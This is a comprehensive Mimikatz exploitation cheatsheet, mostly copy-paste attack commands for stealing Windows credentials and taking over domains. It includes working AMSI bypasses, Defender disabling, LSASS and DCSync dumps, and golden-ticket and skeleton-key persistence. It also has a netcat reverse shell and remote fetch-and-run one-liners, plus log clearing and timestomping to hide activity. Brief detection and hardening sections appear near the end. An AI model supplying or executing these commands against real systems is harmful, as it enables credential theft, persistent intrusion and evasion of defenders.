Complete Mimikatz Exploitation Cheatsheet¶
Overview¶
Mimikatz Capabilities
Mimikatz is the Swiss Army knife for Windows credential exploitation, capable of:
- Memory Extraction: Dump plaintext passwords, NTLM hashes, and Kerberos tickets from LSASS
- Credential Vault: Extract saved credentials from Windows Credential Manager
- Kerberos Attacks: Golden/Silver tickets, Pass-the-Ticket, OverPass-the-Hash
- Token Manipulation: Impersonate users through token manipulation
- Certificate Abuse: Extract certificates and keys from memory/stores
- DPAPI Decryption: Decrypt protected data including Chrome passwords, RDP credentials
- Driver Exploitation: Bypass LSA protection and PPL through kernel drivers
Initial Setup & Bypasses¶
Environment Preparation¶
PowerShell Setup
# Run as Administrator
Start-Process PowerShell_ISE -Verb RunAs
# Disable Windows Defender
Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableIntrusionPreventionSystem $true
Add-MpPreference -ExclusionPath "C:\Temp"
Add-MpPreference -ExclusionProcess "mimikatz.exe"
# Check Defender status
Get-MpComputerStatus | Select AntivirusEnabled,RealTimeProtectionEnabled
AMSI Bypass Required
# Method 1: Obfuscated AMSI bypass
S`eT-It`em ( 'V'+'aR' + 'IA' + ('blE:1'+'q2') + ('uZ'+'x') ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( Get-varI`A`BLE ( ('1Q'+'2U') +'zX' ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em') ) )."g`etf`iElD"( ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile') ),( "{2}{4}{0}{1}{3}" -f ('Non'+'Publ'+'i'),'c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )
# Method 2: Reflection-based bypass
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)
# Method 3: Memory patching
$Win32 = @"
using System;
using System.Runtime.InteropServices;
public class Win32 {
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $Win32
$LoadLibrary = [Win32]::LoadLibrary("amsi.dll")
$Address = [Win32]::GetProcAddress($LoadLibrary, "AmsiScanBuffer")
$p = 0
[Win32]::VirtualProtect($Address, [uint32]5, 0x40, [ref]$p)
$Patch = [Byte[]] (0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3)
[System.Runtime.InteropServices.Marshal]::Copy($Patch, 0, $Address, 6)
LSA Protection Bypass¶
Bypassing LSA Protection
# Check LSA Protection status
reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL
# 0x1 = Protected, 0x0 = Not protected
# Method 1: mimidrv driver
mimikatz # !+
[*] 'mimidrv' service not present
[+] 'mimidrv' service successfully registered
[+] 'mimidrv' service ACL to everyone
[+] 'mimidrv' service started
mimikatz # !processprotect /process:lsass.exe /remove
Process : lsass.exe
PID 528 -> 00/00 [0-0-0]
# Method 2: PPLKiller driver
sc create PPLKiller binPath= C:\temp\PPLKiller.sys type= kernel start= demand
sc start PPLKiller
# Method 3: Exploit vulnerable driver (RTCore64)
mimikatz # misc::aadcookie
SEKURLSA Module - Memory Credentials¶
Core Credential Dumping¶
Primary Credential Extraction
# Standard logonpasswords dump
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'
# Full credential dump with all providers
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::credman" "sekurlsa::wdigest" "sekurlsa::kerberos" "sekurlsa::ssp" "sekurlsa::livessp" "sekurlsa::tspkg" "sekurlsa::cloudap"'
# Export to file
Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords full" "exit"' | Out-File -FilePath C:\temp\creds.txt
Authentication Package Providers¶
All SEKURLSA Providers
# MSV1_0 (NTLM) - Default Windows authentication
sekurlsa::msv
# WDigest - Plaintext passwords (disabled by default on Win10+)
sekurlsa::wdigest
# Kerberos - Tickets and keys
sekurlsa::kerberos
# TsPkg - Terminal Services credentials
sekurlsa::tspkg
# LiveSSP - Live/Outlook credentials
sekurlsa::livessp
# SSP - Security Support Provider credentials
sekurlsa::ssp
# CredMan - Credential Manager
sekurlsa::credman
# CloudAP - Azure AD credentials
sekurlsa::cloudap
# DPAPI - Data Protection API keys
sekurlsa::dpapi
# Ekeys - Kerberos encryption keys
sekurlsa::ekeys
# Trust - Domain trust passwords
sekurlsa::trust
# Backupkeys - DPAPI backup keys
sekurlsa::backupkeys
Process-Specific Credential Dumping¶
Targeted Process Extraction
# Dump from specific process
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
# Create minidump without touching LSASS directly
rundll32.exe C:\windows\system32\comsvcs.dll, MiniDump [LSASS_PID] C:\Temp\lsass.dmp full
# Use with Mimikatz offline
sekurlsa::minidump C:\Temp\lsass.dmp
sekurlsa::logonpasswords full
# Dump from registry hives
reg save HKLM\SYSTEM system.hive
reg save HKLM\SAM sam.hive
reg save HKLM\SECURITY security.hive
lsadump::sam system.hive sam.hive
Kerberos Module - Ticket Attacks¶
Pass-the-Ticket (PTT)¶
Kerberos Ticket Manipulation
# Export all tickets
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'
# List current tickets
klist
# Inject specific ticket
Invoke-Mimikatz -Command '"kerberos::ptt c:\temp\ticket.kirbi"'
# PTT with base64 ticket
kerberos::ptt <base64_ticket>
# Purge all tickets
Invoke-Mimikatz -Command '"kerberos::purge"'
klist purge
# List and export TGT/TGS
kerberos::list /export
kerberos::tgt
Golden Ticket Attack¶
Domain Persistence via Golden Ticket
# Create Golden Ticket (requires krbtgt hash)
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /ptt"'
# Golden Ticket with custom groups
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:FakeAdmin /id:1337 /groups:512,513,518,519,520 /ptt
# Save golden ticket for later use
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /ticket:golden.kirbi
# Golden ticket with start/end/renewal times
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /startoffset:-10 /endin:600 /renewmax:10080 /ptt
Silver Ticket Attack¶
Service-Specific Silver Tickets
# Create Silver Ticket for specific service
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:cifs /rc4:HASH /user:Administrator /ptt
# Common service types:
# CIFS - File access
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:cifs /rc4:HASH /user:admin /ptt
# HOST - WMI, PSRemoting, scheduled tasks
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:HOST /rc4:HASH /user:admin /ptt
# LDAP - Directory queries
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:dc01.corp.local /service:ldap /rc4:HASH /user:admin /ptt
# HTTP - Web services, PSWA
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:server.corp.local /service:HTTP /rc4:HASH /user:admin /ptt
# MSSQL - Database access
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:sql.corp.local /service:MSSQLSvc /rc4:HASH /user:admin /ptt
Trust Ticket Attacks¶
Cross-Domain/Forest Exploitation
# Inter-realm TGT (trust ticket)
Invoke-Mimikatz -Command '"kerberos::golden /domain:child.local /sid:S-1-5-21-XXX /sids:S-1-5-21-YYY-519 /krbtgt:HASH /user:Administrator /ticket:trust.kirbi"'
# Use trust ticket
Invoke-Mimikatz -Command '"kerberos::ptt trust.kirbi"'
# Access parent domain resources
dir \\parent.local\c$
# Extra SID attack for forest compromise
kerberos::golden /user:Administrator /domain:child.local /sid:S-1-5-21-XXX /krbtgt:HASH /sids:S-1-5-21-PARENT-519 /ptt
LSADUMP Module - System Secrets¶
SAM Database Dumping¶
Local Account Hash Extraction
# Online SAM dump
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'
# Offline SAM dump
lsadump::sam /system:system.hive /sam:sam.hive
# With SYSKEY
lsadump::sam /system:system.hive /sam:sam.hive /syskey:0011223344556677889900AABBCCDDEE
# Patch LSASS for SAM dump
lsadump::sam /patch
LSA Secrets Extraction¶
Service Account & Auto-logon Credentials
# Dump LSA secrets
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::secrets"'
# Offline LSA secrets
lsadump::secrets /system:system.hive /security:security.hive
# Cache dump (domain cached credentials)
lsadump::cache
# With specific key
lsadump::cache /system:system.hive /security:security.hive /syskey:0011223344556677889900AABBCCDDEE
DCSync Attack¶
Domain Controller Replication
# Dump specific user (requires DCSync rights)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:Administrator"'
# Dump krbtgt (golden ticket material)
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /user:krbtgt"'
# Dump all users
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /all /csv"' | Export-Csv domain_hashes.csv
# Dump specific user by GUID
lsadump::dcsync /domain:corp.local /guid:{GUID}
# Dump with specific DC
lsadump::dcsync /domain:corp.local /dc:dc01.corp.local /user:Administrator
# Extract NTLM history
lsadump::dcsync /domain:corp.local /user:Administrator /history
Domain Backup Keys¶
DPAPI Domain Backup Keys
# Extract domain backup keys (decrypt any domain DPAPI)
lsadump::backupkeys /system:dc01.corp.local /export
# Use backup keys to decrypt DPAPI blobs
dpapi::masterkey /in:masterkey_file /pvk:ntds_capi_0_GUID.pvk
VAULT Module - Credential Manager¶
Windows Vault Enumeration¶
Stored Credentials Extraction
# List all vaults
vault::list
# Dump Windows Vault credentials
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
# Specific vault GUID
vault::cred /guid:{GUID}
# Web credentials
vault::cred /type:web
# Windows credentials
vault::cred /type:windows
# Domain credentials
vault::cred /type:domain
# Generic credentials
vault::cred /type:generic
Credential Manager Manipulation¶
Credential Manager Attacks
# List stored credentials
cmdkey /list
# Add credential for lateral movement
cmdkey /add:server01 /user:corp\administrator /pass:Password123
# Use stored credential
runas /savecred /user:corp\administrator cmd.exe
# Delete specific credential
cmdkey /delete:server01
TOKEN Module - Token Manipulation¶
Token Impersonation¶
Token-Based Privilege Escalation
# List all tokens
token::list
# Elevate to SYSTEM
token::elevate
# Impersonate specific user token
token::elevate /user:Administrator
# Steal token from process
token::steal [PID]
# Revert to original token
token::revert
# Run command with token
token::run /user:corp\administrator /process:cmd.exe
# Duplicate token
token::duplicate [SOURCE_PID] [TARGET_PID]
Token Privileges¶
Privilege Management
# Enable all privileges
privilege::debug
# List current privileges
privilege::list
# Enable specific privilege
privilege::enable SeDebugPrivilege
privilege::enable SeTakeOwnershipPrivilege
privilege::enable SeBackupPrivilege
privilege::enable SeRestorePrivilege
# Remove privilege
privilege::disable SeDebugPrivilege
DPAPI Module - Protected Data¶
DPAPI Master Keys¶
Decrypting Protected Data
# Dump DPAPI keys from memory
sekurlsa::dpapi
# Decrypt master key with password
dpapi::masterkey /in:masterkey_file /sid:S-1-5-21-XXX /password:Password123
# Decrypt with hash
dpapi::masterkey /in:masterkey_file /sid:S-1-5-21-XXX /hash:NTLM_HASH
# Use domain backup key
dpapi::masterkey /in:masterkey_file /pvk:domain_backup.pvk
# Cache master keys
dpapi::cache
Chrome Password Extraction¶
Browser Credential Theft
# Dump Chrome passwords
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Default\Login Data" /masterkey:MASTERKEY
# With specific profile
dpapi::chrome /in:"%localappdata%\Google\Chrome\User Data\Profile 1\Login Data" /unprotect
# Edge passwords
dpapi::edge /in:"%localappdata%\Microsoft\Edge\User Data\Default\Login Data"
# Firefox (doesn't use DPAPI but NSS)
dpapi::firefox
RDP Credentials¶
Remote Desktop Saved Credentials
# Dump RDP credentials
dpapi::rdg /in:"%localappdata%\Microsoft\Remote Desktop Connection Manager\RDCMan.settings"
# Specific .rdg file
dpapi::rdg /in:C:\Users\user\connections.rdg /unprotect
# Credential files
dpapi::cred /in:"%appdata%\Microsoft\Credentials\*"
WiFi Passwords¶
Wireless Network Keys
# Dump WiFi passwords
dpapi::wifi
# Specific profile
dpapi::wifi /profile:"Corporate WiFi" /unprotect
# Export all WiFi profiles
netsh wlan export profile key=clear folder=C:\temp
CRYPTO Module - Certificates¶
Certificate Export¶
Certificate and Key Extraction
# List certificates
crypto::certificates /systemstore:local_machine
# Export certificates with private keys
crypto::certificates /systemstore:local_machine /export
# Current user certificates
crypto::certificates /systemstore:current_user /export
# Specific store
crypto::certificates /store:my /export
crypto::certificates /store:ca /export
crypto::certificates /store:root /export
# Export to PFX
crypto::certificates /systemstore:local_machine /export /pfx:password123
Certificate Abuse¶
Certificate-Based Attacks
# Extract machine certificates
crypto::capi
crypto::cng
# Patch CryptoAPI for certificate extraction
crypto::capi /patch
crypto::cng /patch
# Import certificate
crypto::certificates /import:cert.pfx /password:password123
# Create fake certificate
crypto::certificates /name:"Microsoft Windows" /subject:"CN=Windows Update" /kty:RSA /size:4096
MISC Module - Additional Attacks¶
Skeleton Key Attack¶
Domain-Wide Backdoor
# Install skeleton key (password: mimikatz)
misc::skeleton
# Now can authenticate as any user with password "mimikatz"
net use \\dc01\c$ /user:Administrator mimikatz
# Remove skeleton key (requires reboot)
# No removal command - only DC reboot
Password Change¶
Direct Password Modification
# Change user password
lsadump::changentlm /user:Administrator /oldntlm:OLD_HASH /newntlm:NEW_HASH
# With cleartext
lsadump::changentlm /user:Administrator /oldpassword:OldPass123 /newpassword:NewPass456
# Domain password change
lsadump::changentlm /server:dc01.corp.local /user:Administrator /oldntlm:HASH /newntlm:HASH
Driver Manipulation¶
Kernel-Level Operations
# Add driver
!+
# Remove driver
!-
# Process protection removal
!processprotect /process:lsass.exe /remove
# Add process protection
!processprotect /process:mimikatz.exe /add
# List kernel callbacks
!notifykuhl
Pass-the-Hash Variants¶
Classic Pass-the-Hash¶
NTLM Authentication Without Password
# PTH with cmd
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# PTH with PowerShell
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:powershell.exe
# PTH with specific program
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:"C:\tools\nc.exe -e cmd.exe 10.10.10.10 443"
# PTH with AES keys
sekurlsa::pth /user:Administrator /domain:corp.local /aes256:AES_KEY /run:cmd.exe
OverPass-the-Hash¶
NTLM to Kerberos Ticket
# Convert NTLM to TGT
sekurlsa::pth /user:Administrator /domain:corp.local /ntlm:HASH /run:cmd.exe
# In new window, request TGT
klist purge
klist
# Access resources (triggers TGT request)
dir \\dc01\c$
Pass-the-Key¶
Kerberos Key Authentication
# PTK with AES256
sekurlsa::pth /user:Administrator /domain:corp.local /aes256:KEY /run:cmd.exe
# PTK with AES128
sekurlsa::pth /user:Administrator /domain:corp.local /aes128:KEY /run:cmd.exe
# PTK with RC4 (NTLM)
sekurlsa::pth /user:Administrator /domain:corp.local /rc4:HASH /run:cmd.exe
Remote Mimikatz Execution¶
PowerShell Remoting¶
Remote Credential Dumping
# Basic remote execution
Invoke-Mimikatz -ComputerName DC01 -Command '"privilege::debug" "sekurlsa::logonpasswords"'
# Multiple computers
Invoke-Mimikatz -ComputerName DC01,SERVER01,WS01 -Command '"sekurlsa::logonpasswords"'
# With credentials
$cred = Get-Credential
Invoke-Mimikatz -ComputerName DC01 -Credential $cred -Command '"sekurlsa::logonpasswords"'
# Through WMI
Invoke-WmiMethod -ComputerName DC01 -Credential $cred -Class Win32_Process -Name Create -ArgumentList "powershell.exe -enc BASE64_MIMIKATZ_COMMAND"
Dump Credentials Remotely¶
Mass Credential Harvesting
# Disable real-time monitoring remotely
Invoke-Command -ComputerName DC01 -ScriptBlock {Set-MpPreference -DisableRealtimeMonitoring $true}
# Deploy and execute
Copy-Item -Path C:\Tools\Invoke-Mimikatz.ps1 -Destination \\DC01\C$\Temp\
Invoke-Command -ComputerName DC01 -FilePath C:\Temp\Invoke-Mimikatz.ps1
# One-liner remote dump
Invoke-Command -ComputerName DC01 -ScriptBlock {IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"'}
Defensive Evasion Techniques¶
Obfuscation Methods¶
AV/EDR Bypass Techniques
# Base64 encode commands
$command = '"privilege::debug" "sekurlsa::logonpasswords"'
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encoded = [Convert]::ToBase64String($bytes)
Invoke-Mimikatz -Command ([System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($encoded)))
# String concatenation
Invoke-Mimikatz -Command ([string]::Join(' ', @('"privilege::debug"', '"sekurlsa::logonpasswords"')))
# Reflective DLL injection
$PEBytes = [IO.File]::ReadAllBytes("C:\temp\mimikatz.exe")
Invoke-ReflectivePEInjection -PEBytes $PEBytes -ExeArgs "privilege::debug sekurlsa::logonpasswords exit"
# Memory-only execution
IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1')
Timestomp & Cleanup¶
Post-Exploitation Cleanup
# Clear event logs
wevtutil cl Security
wevtutil cl System
wevtutil cl Application
# Timestomp files
$(Get-Item C:\temp\mimikatz.exe).LastWriteTime = $(Get-Date "01/01/2019 12:00:00")
$(Get-Item C:\temp\mimikatz.exe).CreationTime = $(Get-Date "01/01/2019 12:00:00")
# Remove artifacts
Remove-Item -Path C:\temp\*.kirbi -Force
Remove-Item -Path C:\temp\*.dmp -Force
# Clear PowerShell history
Remove-Item (Get-PSReadlineOption).HistorySavePath
Clear-History
Output Parsing & Automation¶
Parsing Mimikatz Output¶
Extracting Credentials Efficiently
# Parse for NTLM hashes
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' | Select-String -Pattern "NTLM : \w+" | ForEach-Object { $_.Matches.Value.Replace("NTLM : ", "") }
# Extract all credentials to CSV
$output = Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"'
$credentials = @()
$output -split "`n" | ForEach-Object {
if ($_ -match "Username : (.+)") { $username = $matches[1] }
if ($_ -match "Domain : (.+)") { $domain = $matches[1] }
if ($_ -match "NTLM : (.+)") {
$ntlm = $matches[1]
$credentials += [PSCustomObject]@{
Username = $username
Domain = $domain
NTLM = $ntlm
}
}
}
$credentials | Export-Csv -Path C:\temp\creds.csv -NoTypeInformation
# Auto-format for hashcat
Invoke-Mimikatz -Command '"sekurlsa::logonpasswords"' | Select-String "NTLM :" | ForEach-Object {
$hash = ($_ -split ":")[1].Trim()
if ($hash -ne "null" -and $hash.Length -eq 32) {
$hash
}
} | Out-File C:\temp\hashes.txt
Quick Reference Matrix¶
Mimikatz Module Decision Tree
| Objective | Module | Command | Requirements |
|---|---|---|---|
| Dump plaintext passwords | sekurlsa | sekurlsa::logonpasswords |
Admin + Debug privilege |
| Dump NTLM hashes | sekurlsa | sekurlsa::msv |
Admin + Debug privilege |
| Extract Kerberos tickets | sekurlsa/kerberos | sekurlsa::tickets /export |
Admin + Debug privilege |
| Golden ticket | kerberos | kerberos::golden |
krbtgt hash + domain SID |
| Silver ticket | kerberos | kerberos::golden /service: |
Service account hash |
| Pass-the-hash | sekurlsa | sekurlsa::pth |
NTLM hash |
| DCSync | lsadump | lsadump::dcsync |
Replication rights |
| Dump SAM | lsadump | lsadump::sam |
Admin/SYSTEM |
| Extract certificates | crypto | crypto::certificates /export |
Admin |
| Credential Manager | vault | vault::cred /patch |
Admin |
| DPAPI decryption | dpapi | dpapi::masterkey |
Master key/password |
| Chrome passwords | dpapi | dpapi::chrome |
User context + masterkey |
| Token impersonation | token | token::elevate |
SeDebugPrivilege |
| Skeleton key | misc | misc::skeleton |
Domain Admin on DC |
Detection & OPSEC¶
High-Risk Indicators
Critical Detection Events:
- Event 4624/4672: Privileged logon (especially with SeDebugPrivilege)
- Event 4688: Process creation (mimikatz.exe, powershell.exe)
- Event 4776: NTLM authentication (Pass-the-Hash)
- Event 4768/4769: Kerberos ticket requests (abnormal encryption types)
- Event 4662: DCSync operations (DS-Replication-Get-Changes)
- Event 10: Process access (LSASS access)
- Event 3033/3063: Code integrity failures (unsigned drivers)
Memory Indicators:
- LSASS.exe memory access patterns
- Unsigned process reading LSASS
- Known Mimikatz signatures in memory
- Abnormal privilege token usage
Network Indicators:
- DCSync replication traffic from non-DC
- Kerberos tickets with suspicious lifetimes
- NTLM authentication from unusual sources
Stealth Techniques¶
OPSEC Best Practices
# Use built-in tools when possible
# Instead of Mimikatz for local SAM:
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive
# Process offline with impacket
# Avoid dropping to disk
# Use PowerShell reflection:
[System.Reflection.Assembly]::Load([byte[]])
# Obfuscate process names
Copy-Item mimikatz.exe svchost.exe
# Use legitimate process injection
sekurlsa::pth /user:admin /ntlm:HASH /run:"C:\Windows\System32\mstsc.exe"
# Time your operations
# Run during business hours
# Avoid security tool update windows
# Clean up immediately
Remove-Item *.kirbi, *.dmp, *.txt -Force
Clear-EventLog -LogName Security
Common Issues & Troubleshooting¶
Troubleshooting Guide
| Error | Cause | Solution |
|---|---|---|
| ERROR kuhl_m_sekurlsa_acquireLSA | LSA Protection | Use !+ and !processprotect |
| ERROR kull_m_memory_open | Insufficient privileges | Run as SYSTEM or use token::elevate |
| ERROR kuhl_m_dpapi_unprotect_blob | Wrong masterkey | Extract correct masterkey with sekurlsa::dpapi |
| ERROR kuhl_m_kerberos_ptt | No Kerberos ticket | Verify ticket exists and is valid |
| ERROR kuhl_m_lsadump_dcsync | No DCSync rights | Need DS-Replication-Get-Changes-All |
| ERROR kuhl_m_vault_cred | Vault locked | Use /patch parameter |
| KRB_AP_ERR_SKEW | Time skew > 5 min | Sync time with DC |
| STATUS_ACCESS_DENIED | Protected process | Bypass PPL or use kernel driver |
Alternative Tools & Variations¶
Mimikatz Variants & Alternatives
PowerShell Implementations:
- Invoke-Mimikatz: PowerShell wrapper
- PowerKatz: Pure PowerShell implementation
- Invoke-MimiKittenz: Extracts from common apps
Compiled Variants:
- SafetyKatz: Obfuscated Mimikatz
- BetterSafetyKatz: Further obfuscated
- MimiPenguin: Linux/Unix variant
Specialized Tools:
- Rubeus: Kerberos-focused tool
- SharpKatz: C# port of Mimikatz
- NanoDump: Minimal LSASS dumper
- PPLdump: PPL bypass focused
- LaZagne: Multi-platform password recovery
Living-off-the-land:
# Task Manager LSASS dump (GUI)
# Right-click lsass.exe -> Create dump file
# Procdump (Microsoft signed)
procdump.exe -accepteula -ma lsass.exe lsass.dmp
# Comsvcs.dll method
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump [PID] C:\temp\lsass.dmp full
# Direct clone via DuplicateHandle
# Then dump the cloned process
Advanced Scenarios¶
Domain Persistence Chain¶
Complete Domain Takeover
# 1. DCSync for krbtgt
lsadump::dcsync /domain:corp.local /user:krbtgt
# 2. Create Golden Ticket
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:BackdoorAdmin /id:9999 /groups:512,513,518,519,520 /ptt
# 3. Install Skeleton Key
misc::skeleton
# 4. Extract DPAPI backup keys
lsadump::backupkeys /system:dc01.corp.local /export
# 5. Dump NTDS for offline cracking
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
# 6. Add SID history for persistence
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:backdoor /id:1337 /sids:S-1-5-21-YYY-519 /ptt
Multi-Forest Compromise¶
Cross-Forest Attack Chain
# 1. Dump trust keys
lsadump::trust /patch
lsadump::trust /system:system.hive /sam:sam.hive
# 2. Create inter-realm TGT
kerberos::golden /domain:forest1.local /sid:S-1-5-21-XXX /rc4:TRUST_HASH /user:Administrator /service:krbtgt /target:forest2.local /ticket:trust.kirbi
# 3. Inject and use trust ticket
kerberos::ptt trust.kirbi
# 4. Request TGS for target forest
kerberos::ask /target:forest2.local /service:cifs/dc.forest2.local
# 5. Access resources
dir \\dc.forest2.local\c$
Constrained Delegation Abuse¶
Delegation Attack Chain
# 1. Find delegation
sekurlsa::tickets /export
# 2. Request TGS for delegated service
kerberos::ask /target:service.corp.local /service:cifs/target.corp.local /tgs:TGS_SERVICE.kirbi
# 3. Modify ticket for any user
kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /target:target.corp.local /service:cifs/target.corp.local /user:Administrator /groups:512,513,518,519,520 /ticket:modified.kirbi
# 4. Use modified ticket
kerberos::ptt modified.kirbi
Hardening Against Mimikatz¶
Defensive Measures
Windows Settings:
# Enable Credential Guard
Enable-WindowsOptionalFeature -Online -FeatureName Windows-Defender-Credential-Guard -All
# Enable LSA Protection
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v RunAsPPL /t REG_DWORD /d 1 /f
# Disable WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 0 /f
# Disable NTLM
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 5 /f
# Clear cached credentials
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v CachedLogonsCount /t REG_SZ /d 0 /f
Group Policy Settings:
- Enable "Restrict delegation of credentials to remote servers"
- Configure "Deny access to this computer from the network" for privileged accounts
- Enable "Account is sensitive and cannot be delegated" for service accounts
- Configure Protected Users group membership
- Enable "Audit Process Creation" with command line logging
Command Cheatsheet¶
Essential Commands Quick Reference
# Quick wins
privilege::debug
sekurlsa::logonpasswords
sekurlsa::tickets /export
vault::cred /patch
lsadump::sam
# Lateral movement
sekurlsa::pth /user:X /domain:Y /ntlm:Z /run:cmd
kerberos::ptt ticket.kirbi
kerberos::golden /domain:X /sid:Y /krbtgt:Z /user:Admin /ptt
# Persistence
misc::skeleton
kerberos::golden /domain:X /sid:Y /krbtgt:Z /user:backdoor /ticket:golden.kirbi
# Extraction
lsadump::dcsync /domain:X /user:krbtgt
crypto::certificates /systemstore:local_machine /export
dpapi::masterkey /in:file /sid:X /password:Y
# Cleanup
kerberos::purge
token::revert
!processprotect /process:lsass.exe /add
!-
exit
One-Liners¶
Copy-Paste Ready Commands
# Remote mimikatz with output
IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' | Out-File C:\temp\creds.txt
# DCSync to CSV
Invoke-Mimikatz -Command '"lsadump::dcsync /domain:corp.local /all /csv"' | ConvertFrom-Csv | Export-Csv -Path C:\temp\hashes.csv -NoTypeInformation
# Golden ticket one-liner
Invoke-Mimikatz -Command '"kerberos::golden /domain:corp.local /sid:S-1-5-21-XXX /krbtgt:HASH /user:Administrator /id:500 /groups:512,513,518,519,520 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
# Full dump with everything
Invoke-Mimikatz -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords" "sekurlsa::tickets /export" "vault::cred /patch" "lsadump::sam" "lsadump::secrets" "lsadump::cache"' | Tee-Object -FilePath C:\temp\full_dump.txt
# Skeleton key with validation
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName DC01; net use \\DC01\c$ /user:Administrator mimikatz
Final Notes¶
Legal & Ethical Considerations
- Only use in authorized penetration tests
- Always have written permission
- Follow responsible disclosure
- Clean up all artifacts
- Document actions for reports
- Respect data privacy regulations
Pro Tips
- Always run
privilege::debugfirst - Use
token::elevatefor SYSTEM operations - Export tickets before purging
- Keep copies of original hashes
- Test in lab before production
- Have rollback plans ready
- Monitor your own activity
- Use process injection for stealth
- Combine with other tools for better results
- Remember: Mimikatz is loud - use wisely